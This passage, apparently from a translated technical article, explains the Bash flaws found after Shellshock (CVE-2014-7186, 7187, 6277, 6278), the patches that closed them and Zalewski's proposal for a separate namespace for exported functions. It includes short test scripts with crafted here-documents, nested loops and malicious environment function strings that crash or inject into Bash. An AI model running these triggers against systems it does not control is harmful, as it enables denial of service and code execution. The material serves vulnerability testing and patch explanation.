“contaminated” by the previous operation, the buffer will look like this:
>\
echo date
Note that after the backslash we have a newline character, which according to Bash syntax separates successive commands. Under normal circumstances it would be treated as a separator, but the smuggled backslash turns it into an escape sequence, nullifying the newline’s special meaning. As a result, the buffer contains an expression equivalent to:
>echo date
which is in turn the grammatical equivalent of:
date > echo
The result will therefore be the execution of date with its output redirected to a
file named echo.
The next patch
(bash43-026)
eliminates this flaw by disabling, under certain conditions, the greedy buffering of
incoming data (eol_ungetc_lookahead = 0;).
Name conflicts
The situation was well summarized on his blog by Michal Zalewski (lcamtuf) – a security researcher of Polish origin who also works with Google. He pointed out that the patches proposed so far were merely workarounds whose function was to prevent remote code execution (RCE) and did not solve the problem at its root.
In Zalewski’s view, besides the obvious tightening of the parser, a clear separation of functions and variables stored in the environment should also be introduced. The approach he proposed would involve allocating a separate namespace – that is, placing functions in the environment in such a way that they would never be confused with other information stored there, i.e., so that name conflicts would not occur.
Note that even with protections in the form of patches that disallow Bash command execution during environment reading, there remains a risk that an environment variable originating, say, from a web server could have the same label as a shell variable controlling the execution of a script or of an external command invoked by the shell.
Lcamtuf also suggested introducing a command-line option whose function would be to selectively enable the ability to export functions. Without the appropriate flag, such operations would be disallowed. A complication, however, was the need to maintain backward compatibility of the thus “hardened” interpreter – some scripts used by users and tools for testing distributed software packages make use of shell functions passed between processes.
The use of separate namespaces was introduced by a patch created by Florian
Weimer of Red Hat:
bash43-027. It
defines a constant FUNCDEF_PREFIX containing the string "BASH_FUNC_" and then
restricts the interpretation of environment-variable values as function definitions
to those whose name begins with that string. It also adds a constant
FUNCDEF_SUFFIX, set to a pair of parentheses, so that the name is also checked for
ending with them.
Here is an example of exported functions present in the environment of a child process of Bash with the patch applied:
BASH_FUNC_second_function()=() { echo
}
BASH_FUNC_myfunction()=() { echo
}
Parser-table problems
The aforementioned Weimer also reported in the meantime two fixes for bugs in the
source file parse.y, which were independently discovered by Todd Sabin of
VMware.
One of the flaws (CVE-2014-7186) manifested when multiple here-documents were attached to a single command. The result was an out-of-bounds array index error, leading to an interpreter crash.
The vulnerability can be tested by issuing the following command sequence:
#!/bin/bash
bash -c 'true <<EOF <<EOF <<EOF <<EOF \
<<EOF <<EOF <<EOF <<EOF <<EOF \
<<EOF <<EOF <<EOF <<EOF <<EOF' || \
echo "Vulnerable to CVE-2014-7186"
The second flaw (CVE-2014-7187) could be exploited using a large number of nested loops. The cause was similar – an out-of-bounds array access, but this time triggered by an off-by-one error.
The vulnerability can be tested by running the following script:
#!/bin/bash
(for x in {1..200} ; do echo "for x$x in ; do :"; done; \
for x in {1..200} ; do echo done ; done) | bash || \
echo "Vulnerable to CVE-2014-7187"
The patch, labelled bash43-028, eliminates these problems by introducing invocation counters.
Finale
On 1 October 2014, the already mentioned Michal Zalewski published details of Bash security flaws that he had until then kept secret (CVE-2014-6277 and CVE-2014-6278).
The first problem involved an uninitialized-pointer bug in the function
make_redirection(), which builds the redirection structure (REDIRECT). It is a flaw
similar to CVE-2014-7186, also exploiting here-document parser issues. Depending on
Bash’s compilation flags, the vulnerability can be used either for denial-of-service
attacks (causing an interpreter crash) or – under favourable conditions – for
smuggling and executing arbitrary code via passed parameters and influencing local
variable values.
The vulnerability can be tested using the following script:
#!/bin/bash
export X="() { x() { _; }; x() { _; } <<`perl -e'{print "A"x999}'`;}"
bash -c exit || echo "Vulnerable to CVE-2014-6277"
The next bug, found by lcamtuf using a suite of custom “magic fuzzers”, involves an
unintended alteration of the interpreter’s buffer through the use of a sequence of
nested $ symbols. The problem most likely resides in the function
xparse_dolparen() and in changes introduced in Bash 4.2 (patch level 12).
The vulnerability can be tested by running the following script:
#!/bin/bash
export X="() { _; } >_[$($())] { echo Vulnerable to CVE-2014-6278 ; }"
bash -c exit
Patches and updates
Most GNU/Linux distributions have by now released appropriate patches and updates eliminating the problems described here. Somewhat behind is Apple, whose Mac OS X systems receive updates with a delay. Users speculate that this is probably a licensing issue: the new Bash is released under the terms of the GNU GPL version 3, which is more restrictive than GNU GPL version 2 – and it is the latter that Apple tries to stick with when including free-software packages in its systems.
As for the last two vulnerabilities, they are not yet fully closed (in Bash 4.3 patch level 27), but Weimer’s patches protect against their exploitation.